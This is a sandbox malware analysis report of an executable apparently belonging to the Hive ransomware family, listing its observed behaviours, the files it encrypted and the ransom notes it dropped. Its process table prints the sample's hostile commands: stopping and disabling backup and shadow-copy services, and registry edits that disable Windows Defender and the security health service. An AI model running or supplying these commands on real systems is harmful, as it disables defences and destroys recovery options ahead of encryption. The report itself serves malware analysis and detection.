Analysis Overview
SHA256: eba2f0afd491ee595cd6908494e9e2a2115ed71c053c6d7b94970f1985830ada
Threat Level: Known bad
The file 7987a020052048ad0ec8855c08df2f47c89922f.exe was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Modifies boot configuration data using bcdedit
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Runs net.exe
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Runs ping.exe
MITRE ATT&CK: Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported: 2022-02-17 10:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2022-02-17 10:21
Reported: 2022-02-17 10:23
Platform: win7-en-20211208
Max time kernel: 86s
Max time network: 19s
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
|---|---|---|---|
| File renamed | C:\Users\Admin\Pictures\FormatProtect.tif => C:\Users\Admin\Pictures\FormatProtect.tif.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatProtect.tif.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatSplit.crw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SwitchConvert.raw => C:\Users\Admin\Pictures\SwitchConvert.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SwitchConvert.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnpublishReset.raw => C:\Users\Admin\Pictures\UnpublishReset.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnpublishReset.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21481_.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityResume.Dotx.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_play.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01366_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00686_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE.HXS.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SONORA\PREVIEW.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\MSB1CACH.LEX.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Montevideo.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\mset7fr.kic.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090781.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_ON.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18191_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeFax.Dotx.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0185604.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00435_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0300862.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_dot.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRDEN_01.MID.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Document.gif.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0304933.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CONCRETE\PREVIEW.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
|---|---|
| C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | "C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe" |
| C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y |
| C:\Windows\system32\net.exe | net.exe stop "SamSs" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y |
| C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y |
| C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y |
| C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y |
| C:\Windows\system32\net.exe | net.exe stop "VSS" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y |
| C:\Windows\system32\net.exe | net.exe stop "wbengine" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y |
| C:\Windows\system32\net.exe | net.exe stop "WebClient" /y |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y |
| C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled |
| C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
